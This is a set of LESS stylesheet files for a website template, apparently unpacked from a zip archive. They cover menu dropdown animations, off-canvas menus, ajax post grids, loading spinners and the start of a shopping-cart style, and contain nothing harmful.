 	.transition(all .4s cubic-bezier(0.5,0,0.3,1));
 }


.menu .nav-child.small {
	font-size: inherit;
}
/*=========================================
 *======= 	Menu Animation   ============
 *=======================================*/
//Drop Down Animation
.sp-megamenu-parent {
	
    //Fade in up Animation
    &.menu-fade-up {
		
		.sp-has-child {
			>.sp-dropdown {
				display: block;
				opacity: 0;
				visibility: hidden;
				-webkit-transform: translate3d(0,30px,0);
				-moz-transform: translate3d(0,30px,0); 
        		transform: translate3d(0,30px,0);
				-webkit-transform-origin: 50% 50%;
				transform-origin: 50% 50%;
				.transition(~'-webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease');	
			}
		}

		.sp-has-child:hover {
			>.sp-dropdown {
				display:block;
				opacity:1;
				visibility:visible;
				-webkit-transform: translate3d(0,0,0);
				-moz-transform: translate3d(0,0,0); 
        		transform: translate3d(0,0,0);
			}
		}
		/*
        .sp-has-child:hover {
            >.sp-dropdown {
                -webkit-animation: spMenuFadeInUp 0.5s ease;
                animation: spMenuFadeInUp 0.5s ease;
            }
        }
		*/
    }
    //Rotate Menu Animation
    &.menu-rotate {
        .sp-has-child:hover {
            >.sp-dropdown {
                opacity: 1;
				-webkit-transform:perspective(1000px) rotateX(0deg);
        		transform:perspective(1000px) rotateX(0deg);
                visibility: visible;
						
            }
        }
    }
    // Menu Slide Down
    &.menu-slide-down {
		
		.sp-has-child {
			>.sp-dropdown {
				display: block;
				//opacity: 0;
				visibility: hidden;
				//.transition(~'-webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease');
				
				/*
				&.sp-dropdown-mega{
					left: auto;
					right: 0;
				}
				*/
			}
		}
        .sp-has-child:hover {
            >.sp-dropdown {
                //display:block;
				//opacity:1;
				visibility:visible;
				-webkit-animation: spMenuSlideDown 0.5s ease;
                animation: spMenuSlideDown 0.5s ease;

            
				&.sp-dropdown-sub {
					//top: -10px;
					left: 100%;			
				}
            }
        }
    }
}

/* =================== Rotate Menu Drop Down =============== */
.menu-rotate {
    .sp-has-child {

        >.sp-dropdown {
            -webkit-transform-origin: top center;
            transform-origin: top center;
			-webkit-transform:perspective(1200px) rotateX(-70deg);
        	transform:perspective(1200px) rotateX(-70deg);
			.transition(~'-webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease');
            opacity: 0;
            visibility: hidden;
            display: block;
			
            &.sp-dropdown-mega{
                left: auto;
                right: 0;
            }
        }
    }
}

/* ======================== Drop In ====================== */
.menu-drop-in{
    .sp-has-child {
		
		>.sp-dropdown {
			-webkit-animation: spMenuFadeInUp 0.7s ease;
             animation: spMenuFadeInUp 0.7s ease;
		}

        .sp-dropdown-inner{
            background: transparent none repeat scroll 0 0;
            //box-shadow: none;
			box-shadow: 0 2px 4px 0 rgba(0, 0, 0, 0.1);
        }
        .sp-dropdown-items {
            perspective: 1000px;
        }
        .sp-menu-item{
            -webkit-transform: translate(0,100px);
            transform: translate(0,100px);
            opacity: 0;
			.transition(~'-webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.35s ease, visibility 0.35s ease');	
			
        }
        &:hover{
			
            .sp-menu-item{
                -webkit-animation-timing-function : ease-in-out;
                animation-timing-function : ease-in-out;
                -webkit-animation-fill-mode: forwards;
                animation-fill-mode: forwards;
                -webkit-animation-name: dropup;
                animation-name: dropup;
				
				
               &:nth-child(1){
                    -webkit-animation-duration: 0.2s;
                    animation-duration: 0.2s;
                }
                &:nth-child(2){
                    -webkit-animation-duration: 0.3s;
                    animation-duration: 0.3s;
                }
                &:nth-child(3){
                    -webkit-animation-duration: 0.4s;
                    animation-duration: 0.4s;
                }
                &:nth-child(4){
                    -webkit-animation-duration: 0.5s;
                    animation-duration: 0.5s;
                }
                &:nth-child(5){
                    -webkit-animation-duration: 0.6s;
                    animation-duration: 0.6s;
                }
                &:nth-child(6){
                    -webkit-animation-duration: 0.7s;
                    animation-duration: 0.7s;
                }
                &:nth-child(7){
                    -webkit-animation-duration: 0.8s;
                    animation-duration: 0.8s;
                }
                &:nth-child(8){
                    -webkit-animation-duration: 0.9s;
                    animation-duration: 0.9s;
                }
				&:nth-child(9){
                    -webkit-animation-duration: 1s;
                    animation-duration: 1s;
                }
				&:nth-child(10){
                    -webkit-animation-duration: 1.1s;
                    animation-duration: 1.1s;
                }
				&:nth-child(11){
                    -webkit-animation-duration: 1.2s;
                    animation-duration: 1.2s;
                }
				&:nth-child(12){
                    -webkit-animation-duration: 1.3s;
                    animation-duration: 1.3s;
                }
				
            }
        }
    }
}

/* Important hack (only) for mobile devices hover/click on parent link */
.mobile {
	.sp-megamenu-parent {		
		.sp-has-child {
			.sp-dropdown {
				display:none;
			}
			&:hover,
			&:focus {
				.sp-dropdown {
					z-index: 99;
					opacity:0;
					visibility:hidden;
					-webkit-animation:MobileFadeInDown 0.35s ease forwards 0.1s;
					animation:MobileFadeInDown 0.35s ease-in-out forwards 0.1s;
				}
			}
		}

	}
}

//Drop In Animation
@keyframes dropup {
    0%   {opacity:0; transform: translate(0,100px);}
    100% {opacity:1; transform: translate(0,0);}
}
@-webkit-keyframes dropup {
    0%   {opacity:0; transform: translate(0,100px); }
    100% {opacity:1; transform: translate(0,0);}
}

/* ================== Twist Menu =================== */
.menu-twist{
    .sp-has-child {
		>.sp-dropdown {
			-webkit-animation: spMenuFadeInUp 0.7s ease;
             animation: spMenuFadeInUp 0.7s ease;
		}
		
        .sp-dropdown-inner{
            background: transparent none repeat scroll 0 0;
            //box-shadow: none;
			box-shadow: 0 2px 4px 0 rgba(0, 0, 0, 0.1);
        }
        .sp-menu-item{
            -webkit-transform: rotateY(90deg);
            transform: rotateY(90deg);
        }
        &:hover{
            .sp-menu-item{
                -webkit-animation-direction: normal;
                animation-direction: normal;
                -webkit-animation-iteration-count:1;
                animation-iteration-count:1;
                -webkit-animation-timing-function : ease-in-out;
                animation-timing-function : ease-in-out;
                -webkit-animation-fill-mode: forwards;
                animation-fill-mode: forwards;
                -webkit-animation-name: twist;
                animation-name: twist;
                &:nth-child(1){
                    -webkit-animation-duration: 0.2s;
                    animation-duration: 0.2s;
                }
                &:nth-child(2){
                    -webkit-animation-duration: 0.3s;
                    animation-duration: 0.3s;
                }
                &:nth-child(3){
                    -webkit-animation-duration: 0.4s;
                    animation-duration: 0.4s;
                }
                &:nth-child(4){
                    -webkit-animation-duration: 0.5s;
                    animation-duration: 0.5s;
                }
                &:nth-child(5){
                    -webkit-animation-duration: 0.6s;
                    animation-duration: 0.6s;
                }
                &:nth-child(6){
                    -webkit-animation-duration: 0.7s;
                    animation-duration: 0.7s;
                }
                &:nth-child(7){
                    -webkit-animation-duration: 0.8s;
                    animation-duration: 0.8s;
                }
                &:nth-child(8){
                    -webkit-animation-duration: 0.9s;
                    animation-duration: 0.9s;
                }
				&:nth-child(9){
                    -webkit-animation-duration: 1s;
                    animation-duration: 1s;
                }
				&:nth-child(10){
                    -webkit-animation-duration: 1.1s;
                    animation-duration: 1.1s;
                }
				&:nth-child(11){
                    -webkit-animation-duration: 1.2s;
                    animation-duration: 1.2s;
                }
				&:nth-child(12){
                    -webkit-animation-duration: 1.3s;
                    animation-duration: 1.3s;
                }
            }
        }
    }
}
/* Twist Animation */
@keyframes twist {
    0%   {opacity:0;	transform: rotateY(90deg);}
    100% {opacity:1; transform:  rotateY(0);}
}
@-webkit-keyframes twist {
    0%   {opacity:0;-webkit-transform:  rotateY(90deg); }
    100% {opacity:1; -webkit-transform: rotateY(0);}
}

/*===========	Menu Animation   ============*/
//Fade in
@-webkit-keyframes spMenuFadeIn {
    0% {
        opacity: 0;
    }

    100% {
        opacity: 1;
    }
}

@keyframes spMenuFadeIn {
    0% {
        opacity: 0;
    }

    100% {
        opacity: 1;
    }
}
//Zoom
@-webkit-keyframes spMenuZoom {
    0% {
        opacity: 0;
        -webkit-transform: scale(.8);
    }

    100% {
        opacity: 1;
        -webkit-transform: scale(1);
    }
}

@keyframes spMenuZoom {
    0% {
        opacity: 0;
        transform: scale(.8);
        -webkit-transform: scale(.8);
    }

    100% {
        opacity: 1;
        transform: scale(1);
        -webkit-transform: scale(1);
    }
}
//Fade in Down (Slide In) Animation
@-webkit-keyframes spMenuSlideDown {
    0% {
        opacity: 0;
        -webkit-transform: translate3d(0, -30px, 0);
    }

    100% {
        opacity: 1;
        -webkit-transform: none;
    }
}

@keyframes spMenuSlideDown {
    0% {
        opacity: 0;
        transform: translate3d(0, -30px, 0);
    }

    100% {
        opacity: 1;
        transform: none;
    }
}

//Fade in Up
@-webkit-keyframes spMenuFadeInUp {
    0% {
        opacity: 0;
		visibility:hidden;
        -webkit-transform: translate3d(0, 30px, 0);
    }

    100% {
        opacity: 1;
		visibility:visible;
        -webkit-transform: translate3d(0, 0, 0);
    }
}

@keyframes spMenuFadeInUp {
    0% {
        opacity: 0;
		visibility:hidden;
        transform: translate3d(0, 30px, 0);
    }

    100% {
        opacity: 1;
		visibility:visible;
        transform: translate3d(0, 0, 0);
    }
}

// Fix for Mobile Dropdown!
@-webkit-keyframes MobileFadeInDown {
  0% {
	opacity: 0;
    -webkit-transform: translate3d(0, -30px, 0);	
  }

  100% {
    opacity: 1;
	visibility:visible;
    -webkit-transform: none;
  }
}
@keyframes MobileFadeInDown {
  0% {
    opacity: 0;
    transform: translate3d(0, -30px, 0);
  }

  100% {
    opacity: 1;
	visibility:visible;
    transform: none;
  }
}


/* =============== Slide Top Off Canvas Menu ============== */
.slide-top-menu{
    .offcanvas-menu{
        -webkit-transform: translateX(0);
        transform: translateX(0);
    }
    .off-canvas-menu-wrap {
        right: 0;
    }
    .offcanvas-overlay{
        visibility: visible;
        opacity: 1;
    }
    .offcanvas-menu {
        right: 0;
        visibility: visible;

    }
}

/* ========= Full Screen Off Canvas Menu ========= */
.full-screen{
    .offcanvas-menu{
        right: -100%;
        width: 100%;
        transform: translateX(0);
        transition: all .6s cubic-bezier(0.5,0,0.3,1);
        .offcanvas-inner {
            margin: 0 auto;
            text-align: center;
            .sp-module{
                margin-bottom: 8vh;
                margin-top: 8vh;
                padding-bottom: 0;
                ul {
                    background: transparent;
                    height: auto;
                    li {
                        overflow: inherit;
						border:none;
						.separator, .nav-header{
							font-size: 140%;
							color:#a0a0a0;
						}
                        a{
                            //color: #fff;
							border:none;
                            display: inline-block;
                            font-size: 190%;
                            padding: 5px 20px;
							margin: 0 auto;
							
                            &:before{
                                display: none;
                            }
                            &:hover,
                                &:focus{
                                background: transparent;
                            }
                        }
                        .accordion-menu-toggler{
                            position:relative;
							left: auto;
							width:50px;
                            right: auto;
                            font-size: 28px;
							top:1px;
                        }
                        ul{
                            li{
                                display: block;
                                a{
                                    margin: 0 auto;
									font-size: 120%;
                                }
                                .accordion-menu-toggler{
                                    font-size:20px;
									top:5px;
                                }
								
								&:last-child {
									margin: 0 auto 20px;
								}
                            }

                        }
                        &:hover,
                            &:focus{
                            a{
                                background: transparent;
                            }
                        }
						
                    }
                    &.nav.menu{
                        padding-bottom: 75px;
                    }
                }
                .search{
                    max-width: 300px;
                    margin: 25px auto 0;
                }
                .sp-module-title {
                    font-size: 28px;
                }
            }
        }
        .close-offcanvas {
            font-size: 20px;
            height: 35px;
            line-height: 1;
            right: 30px;
            top: 25px;
            width: 35px;
            padding-top: 6px;
        }
    }

}
.full-screen-off-canvas{
    &.ltr{
        .offcanvas-menu{
            visibility: visible;
            z-index: 9999;
            width: 100%;
            right: 0;
        }
    }
}

/* =============== Full Screen Off Canvas From Top ================== */
.full-screen-ftop{
    .offcanvas-menu{
        right: 0;
        width: 100%;
        opacity: 0;
        -webkit-transform: translateX(0);
        transform: translateX(0);
        transition: all 0.5s cubic-bezier(0.5,0,0.3,1);
        .offcanvas-inner {
            margin: 0 auto;
            text-align: center;
            .sp-module{
                margin-bottom: 80px;
                margin-top: 80px;
                padding-bottom: 0;
                ul {
                    background: transparent;
                    height: auto;
                    >li{
                        opacity: 0;
                        -webkit-transform: translate3d(0px, -80px, 0px);
                        transform: translate3d(0px, -80px, 0px);
                        -webkit-transition: transform 0.5s ease 0s, opacity 0.5s ease 0s;
                        transition: transform 0.5s ease 0s, opacity 0.5s ease 0s;
                    }
                    li {
                        overflow: inherit;
						
						.separator, .nav-header{
							font-size: 120%;
							color:#a0a0a0;
						}
						
                        a{
                            border:none;
                            display: inline-block;
                            font-size: 190%;
                            padding: 5px 20px;
							margin: 0 auto;
                            &:before{
                                display: none;
                            }
                            &:hover,
                                &:focus{
                                background: transparent;
                            }
                        }
                        .accordion-menu-toggler{
                            position:relative;
							left: auto;
                            right: auto;
                            font-size: 28px;
							width:50px;
							top:1px;
                        }
                        ul{
                            li{
                                display: block;
                                a{
                                    margin: 0 auto;
									font-size: 120%;
                                }
                                .accordion-menu-toggler{
                                    font-size:20px;
									top:5px;
                                }
								&:last-child {
									margin: 0 auto 20px;
								}
                            }

                        }
                        &:hover,
                            &:focus{
                            a{
                                background: transparent;
                            }
                        }
                    }
                    &.nav.menu{
                        padding-bottom: 75px;
                    }
                }
                .search{
                    max-width: 300px;
                    margin: 25px auto 0;
                }
                .sp-module-title {
                    font-size: 28px;
                }
            }
        }
        .close-offcanvas {
            font-size: 20px;
            height: 35px;
            line-height: 1;
            right: 30px;
            top: 25px;
            width: 35px;
            padding-top: 6px;
        }
    }

}
.full-screen-off-canvas-ftop{
    &.ltr{
        .offcanvas-menu{
            visibility: visible;
            z-index: 9999;
            width: 100%;
            right: 0;
            opacity: 1;
            .sp-module{
                margin-top: 80px;
				margin-bottom: 80px;
                ul {
                    background: transparent;
                    height: auto;
                    >li{
                        opacity: 1;
                        -webkit-transform: translate3d(0px, 0px, 0px);
                        transform: translate3d(0px, 0px, 0px);
                    }
                }
            }
        }
    }
}
/* =================== New Look Off Canvas Menu ================ */
.new-look{
    .offcanvas-menu{
        background-color: #222;
		background-color: fade(#222, 95%);
        .sp-module {
			
            ul {
                >li {
					
                    >a{
						color:#e0e0e0;
                        &:hover,
						&:focus{
							color: #f7f7f7;
						}
						
                    }
					
                    .accordion-menu-toggler{
                        top: 0;
						display:block;
						float:right;
                        padding:10px;
						height:48px;
						width:33%;
						
                        i{
                           display: none !important;
                        }
                        &:before{
                            background: #eee none repeat scroll 0 0;
              				content: "";
                            height: 8px;
                            left: auto;
                            position: absolute;
                            right: 23px;
                            top: 22px;
                            width: 2px;
                            -webkit-transform: rotate(-45deg);
                            transform: rotate(-45deg);
                        }
                        &:after{
                            background: #eee none repeat scroll 0 0;
                            content: "";
                            height: 2px;
                            left: auto;
                            position: absolute;
                            right: 20px;
                            top: 25px;
                            width: 8px;
                            -webkit-transform: rotate(-45deg);
                            transform: rotate(-45deg);
                        }
                        &.collapsed{
                            &:before{
                                -webkit-transform: rotate(0deg);
                                transform: rotate(0deg);
                            }
                            &:after{
                                -webkit-transform: rotate(0deg);
                                transform: rotate(0deg);
                            }
                        }

                    }
          
                }

            }
        }
    }
	
}

.full-screen, .full-screen-ftop {
    .offcanvas-menu{ 
		.accordion-menu {
			.separator {
				> a:hover {
					background: transparent!important;
				}
				
			}
			li {		   
				a{
					font-size: 170%;
					line-height:2;
					padding: 20px;
					margin:5px 0!important;
				}
				
				.accordion-menu-toggler{
				    top: 0;
						display:block;
						margin-top:-7px;
				}
				ul{
					li{
			
						a{
							font-size: 16px!important;
							padding: 0!important;
						}
						.accordion-menu-toggler{
							padding: 6px 10px;
							margin-top:3px;
						}
						
						&:last-child {
							margin: 0 auto 20px;
						}
						 &.parent {
							> a{
								font-size: 19px!important;
							}
						}
					}

				}
			 }
		}
	}
}




.new-look-off-canvas{
    .offcanvas-overlay{
        visibility: visible;
        opacity: 1;
    }
    &.ltr{
        .offcanvas-menu{
            visibility: visible;
            right: 0;
            -webkit-transform: translateX(0);
            transform: translateX(0);
        }
    }
}

/* ====================== Firefox Only Css ==================== */
@-moz-document url-prefix() {
    .offcanvas-menu {
        right: -320px;
        transform: translateX(0px);
    }
}

@media (max-width: @screen-md-min) {
	
	
	#offcanvas-toggler {
		position:relative;
		z-index:10;
		>i {
			padding:0;
			font-size:28px;
			text-align:center;
			width:90px;
		}
	}
	
	header.centered.dark {
		#sp-menu {
			.centered {
				
				#offcanvas-toggler {
					display:block;
					>i {
						display: block;
						padding: 0 50px;
						font-size: 32px;
						background: transparent;
						margin:0 auto;
					}
				}
		
			}
		}
	}
	header.addspace {
		#sp-menu {
			.centered {
				#offcanvas-toggler {
					margin:0 auto;
					display:inline-block;
					>i {
						display: inline-block;
						margin:0 auto;
					}
				}
		
			}
		}
		#offcanvas-toggler {
			margin-right:0px;
	    }
	}

}
PK!����/�/"flex/less/ajax-intro-articles.lessnu&1i�
.ajax-posts, .grid {
	.transition(height 0.7s ease);
	-webkit-transform-origin: 50% 100%;
	transform-origin: 50% 100%;
	overflow:hidden; /* Overflow hidden is important to stop jerk on loading */
}
.ajax-post {
	padding:0;
	margin:0; 
	-webkit-transform-origin: 50% 50%;
	transform-origin: 50% 50%;
	
	.inner {
		
		[class^="entry-"] {
			margin:0 0 22px 0; /* Starting bottom margin for post formats */
		}
	
		&.intro-left {
			width:auto;
			h3.aga_heading {
				margin-top:0;
				padding-top:0;
			}
			
		}
		&.intro-center {
			.entry-image,
			div[class^="entry-"] {
				margin:0 auto;
			}
		}
		&.intro-right {
			h3.aga_heading {
				margin-top:0;
				padding-top:0;
			}
		}
	
		.intro-image {
			position:relative;
			display:block;
			margin:0 auto;
			-webkit-transform: translateZ(0) scale(1.0001);
			transform: translateZ(0) scale(1.0001);
			overflow:hidden;
			
			
			a {	
				img.post-img {
					.transition(.7s cubic-bezier(0.250,0,0.350,1.100) .1s);
					-webkit-transform: translateZ(0) scale(1);
					transform: translateZ(0) scale(1);
					width:100%;
					/* IMPORTANT HACK: blur changed from pixels to ems 0.01em, to prevent flickering on hover */
					-webkit-filter: blur(0.01em) grayscale(0%);
					filter: blur(0.01em) grayscale(0%);
				}
			}
		}
		
		&.overlay {
			
			.intro-image{
				overflow: hidden;
			
				a {	
					display:block;
					
					&:after {
						content:"";
						top:0;
						left:0;
						right:0;
						bottom: 0;
						text-align: center;
						color: #fff;
						.transition(background .5s ease);
						background:transparent;
						display:block;
						position:absolute;
						width:100%;
						height:100%;
					}
					.caption-content {
						position: absolute;
						font-weight: 500;
						font-size:100%;
						color:#fff;
						padding:0 10%;
						top: 53%;
						//margin:0 auto;
						width: 100%;
						text-align: center;
						.transition(.7s cubic-bezier(0.300,0,0.100,1.100) .1s);
						-webkit-transition-property: -webkit-transform, opacity;
						-moz-transition-property: -moz-transform, opacity;
						transition-property: transform, opacity;
						-ms-transform: translateY(-20%);
						-webkit-transform: translateY(-20%);
						transform: translateY(-20%);
						text-shadow:1px 1px 1px rgba(0,0,0,.2);
						opacity:0;
						z-index:2;
						
						small {
							font-size:12px;
							margin:0 4px;
							display:inline-block;
							>i {
								font-size:125%;
								vertical-align:middle;
								margin:-2px 3px 0;
							}
							&.ratings {
								font-size:11px;
								
							}
							.voting-symbol {
								font-size:10px;
							}
						}
						.caption-category {
							padding:2px 12px;
							display:table;
							width:auto;
							margin:8px auto 0;
							background:rgba(255,255,255,.25);
							border-radius:4px;
							box-shadow:0 1px 1px rgba(0,0,0,.1);
							font-weight: 500;
							font-size:12px;
							color:#fff;
							
							.posted-in {
								opacity:0.65;
							}
							
						}
					}
			
					&:hover{
		
						&:after {
							background:fade(@major_color, 65%);
						}
						.caption-content {
							opacity:1;	
							-ms-transform: translateY(-50%);
							-webkit-transform: translateY(-50%);
							transform: translateY(-50%);
						}
						
					}
				}
			}
		}
	}
}
.loader_footer, .grid_footer, #dc-load-more {
	position:relative;
	clear:both;
	overflow:hidden;
	opacity:1;
	display:block;/* fallback for older browsers, not supporting flexbox */
	.flexbox();
	.flex-align-items();
	.flex-justify-content(center);
	.transition(all .45s ease);	
	margin:15px auto 0;
	width:100%;
	height:44px;
	-webkit-transform-origin: 50% 50%;
	transform-origin: 50% 50%;
	
	.load-more-ajax {
		margin:0 auto;
		height:44px;
	}
	
	
	&.done {
		opacity:0;
		visibility:hidden;
		height:0;
		-webkit-transform: rotateX(-90deg);
		transform: rotateX(-90deg);
	}
}

/* Animations */
@-webkit-keyframes simpleFade{
	0% {
		opacity: 0;
	  }
    100%{
        opacity:1;
    }
}
@keyframes simple-fade{
	0% {
		opacity: 0;
	  }
    100%{
        opacity:1;
    }
}
.simple-fade{
    -webkit-animation-name:simple-fade;
    animation-name:simple-fade;
	-webkit-backface-visibility: hidden;
	-webkit-animation-duration:1s;
    animation-duration:1s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}
@-webkit-keyframes fade-in-up{
	0% {
		opacity: 0;
	    -webkit-transform:translate3d(0,50px,0);
        transform:translate3d(0,50px,0);
	  }
    100%{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
@keyframes fade-in-up{
	0% {
		opacity: 0;
	    -webkit-transform:translate3d(0,50px,0);
        transform:translate3d(0,50px,0);
	  }
    100%{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
.fade-in-up{
    -webkit-animation-name:fade-in-up;
    animation-name:fade-in-up;
	-webkit-transform-origin: 50% 50%;
	transform-origin: 50% 50%;
	-webkit-backface-visibility: hidden;
	-webkit-animation-duration:1s;
    animation-duration:1s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}
@-webkit-keyframes fade-in-down{
	0% {
		opacity: 0;
		-webkit-transform: translate3d(0,-50px,0);
		transform: translate3d(0,-50px,0);
	  }
    100%{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
@keyframes fade-in-down{
	0% {
		opacity: 0;
	    -webkit-transform:translate3d(0,-50px,0);
        transform:translate3d(0,-50px,0);
	  }
    100%{
        opacity:1;
        -webkit-transform:none;
        transform:none;
    }
}
.fade-in-down{
    -webkit-animation-name:fade-in-down;
    animation-name:fade-in-down;
	-webkit-animation-duration:1s;
    animation-duration:1s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}
@-webkit-keyframes appear-in{
    0%{
        opacity:0;
        -webkit-transform:translate3d(0,-10px,0) scale(0.7) perspective(1200px) rotateX(-60deg);
        transform:translate3d(0,-10px,0) scale(0.7) perspective(1200px) rotateX(-60deg);
    }
	45% {
		opacity: 0.4;
	    -webkit-transform:translate3d(0,20%,0) scale(1.05) perspective(600px) rotateX(-15deg);
        transform:translate3d(0,20%x,0) scale(1.05) perspective(600px) rotateX(-15deg);
	}
	100%{
        opacity:1;
        -webkit-transform:translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
        transform:translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    }
}
@keyframes appear-in{
    0%{
        opacity:0;
        -webkit-transform:translate3d(0,-10px,0) scale(0.7) perspective(1200px) rotateX(-60deg);
        transform:translate3d(0,-10px,0) scale(0.5) perspective(1200px) rotateX(-60deg);
    }
	45% {
		opacity: 0.4;
	    -webkit-transform:translate3d(0,20%,0) scale(1.05) perspective(600px) rotateX(-15deg);
        transform:translate3d(0,20%,0) scale(1.05) perspective(600px) rotateX(-15deg);
	}
	100%{
        opacity:1;
        -webkit-transform:translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
        transform:translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    }
}
.appear-in{
    -webkit-animation-name:appear-in;
    animation-name:appear-in;
	-webkit-backface-visibility: hidden;
	-webkit-transform-origin: 50% 0%;
	transform-origin: 50% 0%;
	-webkit-animation-duration:1.2s;
    animation-duration:1.2s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}

.flippin-effect {
	margin:0 auto;
	-webkit-transform-style: preserve-3d;
	transform-style: preserve-3d;
	-webkit-transform-origin: 50% 0%;
	transform-origin: 50% 0%;
	-webkit-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
	-moz-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
	-ms-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
	-o-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
	animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
}

@-webkit-keyframes flippin {
  from {
    opacity: 0;
	/*height:0;*/
	-webkit-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	-moz-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	-ms-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	-o-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
  }
  to {
    opacity: 1;
	//visibility:visible;
	-webkit-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	-moz-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	-ms-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	-o-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	
  }
}

@keyframes flippin {
 from {
    opacity: 0;
	/*height:0;*/
	//visibility:hidden;
	-webkit-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	-moz-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	-ms-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	-o-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
	transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);

  }
  to {
    opacity: 1;
	//visibility:visible;
	-webkit-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	-moz-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	-ms-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	-o-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
	
  }
}
// Zoom-In Effect
@-webkit-keyframes intro-zoom-in {
	0%{
		opacity:0;
		-webkit-transform:translateZ(0) scale(0.5);
		transform:translateZ(0) scale(0.5);
	}
	
	100%{
		opacity:1;
		-webkit-transform:translateZ(120px) scale(1);
		transform:translateZ(120px) scale(1);
	}
}

@keyframes intro-zoom-in {
  0%{
		opacity:0;
		-webkit-transform:translateZ(0) scale(0.5);
		transform:translateZ(0) scale(0.5);
	}
	
	100%{
		opacity:1;
		-webkit-transform:translateZ(120px) scale(1);
		transform:translateZ(120px) scale(1);
	}
}
.intro-zoom-in {
    -webkit-animation-name:intro-zoom-in;
    animation-name:intro-zoom-in;
	-webkit-backface-visibility: hidden;
	-webkit-animation-duration:0.8s;
    animation-duration:0.8s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}

/* Ajax Loading */
.loader_footer {

	.load-more-ajax {
		outline:0;
		//color:inherit;
	
		&.focus,
		&:focus,
		&:active,
		&.active {
			-webkit-box-shadow:none!important;
			box-shadow:none!important;
			text-align:center;		
		}
		.btn-text {

		}
		.spinner {
			outline:0;
			//margin:0 0.01em!important;
			text-align:center;
			line-height:13px;
			
			> div {
				width: 14px;
				height: 14px;
				line-height:13px;
				text-align:center;
				margin:0 -2px 0 2px;
				vertical-align:middle;
				border-radius: 100%;
				display:inline-block;
				-webkit-animation: dc-load-more-bouncedelay 1.2s infinite ease-in-out both;
				animation: dc-load-more-bouncedelay 1.2s infinite ease-in-out both;
				
			}
			.bounce1 {
			  -webkit-animation-delay: -0.5s;
			  animation-delay: -0.5s;
			}
			.bounce2 {
			  -webkit-animation-delay: -0.25s;
			  animation-delay: -0.25s;
			}
		}
	}
	
}

@-webkit-keyframes dc-load-more-bouncedelay {
  0%,
  80%,
  100% {
    -webkit-transform: scale(0.2);
	opacity:0;
  }
  40% {
    -webkit-transform: scale(1);
	opacity:1;
  }
}
@keyframes dc-load-more-bouncedelay {
  0%,
  80%,
  100% {
    -webkit-transform: scale(0.2);
    transform: scale(0.2);
	opacity:0;
  }
  40% {
    -webkit-transform: scale(1);
    transform: scale(1);
	opacity:1;
  }
}

@media (max-width: 480px) {
	.ajax-posts .ajax-post .intro-left, .ajax-posts .ajax-post .intro-right  {
		> div  {
			width: 100%!important;
			padding-left:0!important;
			padding-right:0!important;
			.aga_heading {
				margin-top:25px!important;
			}
		}
	}
}
PK!�z�&�&�flex/less/virtuemart.lessnu&1i�
.cd-img-replace {
  /* replace text with a background-image */
  display: inline-block;
  overflow: hidden;
  text-indent: 100%;
  white-space: nowrap;
}

.overflow-hidden,
.sticky .menu-is-open {
	overflow: hidden;
	
}

#cart-menu {
	position: relative;
	right:0;
	display:block;
	z-index: 1003;
	/* Force Hardware Acceleration in WebKit */
	-webkit-transform: translateZ(0);
	-webkit-backface-visibility: hidden;
	-webkit-transition-property: -webkit-transform;
	-moz-transition-property: -moz-transform;
	transition-property: transform;
	-webkit-transition-duration: 0.4s;
	-moz-transition-duration: 0.4s;
	transition-duration: 0.4s;
	
	  #cd-menu-trigger,
	  .cd-cart {
		position: relative;
		display:inline-block;
		
		height: 100%;
		margin:0 auto;
		.transition(background .2s ease);
		
		  >i {
			  display:block;
			  width:80px;
			  text-align:center;
			  font-size:28px;	  
			  
		  }
		  
		  
		  	.total_products {
				/* number of items added to the cart */
				position: absolute;
				right: 13px;
				height: 20px;
				width: 20px;
				line-height: 20px;
				color: #fff;
				font-size: 11px;
				font-weight:bold;
				text-align: center;
				border-radius: 50%;
				
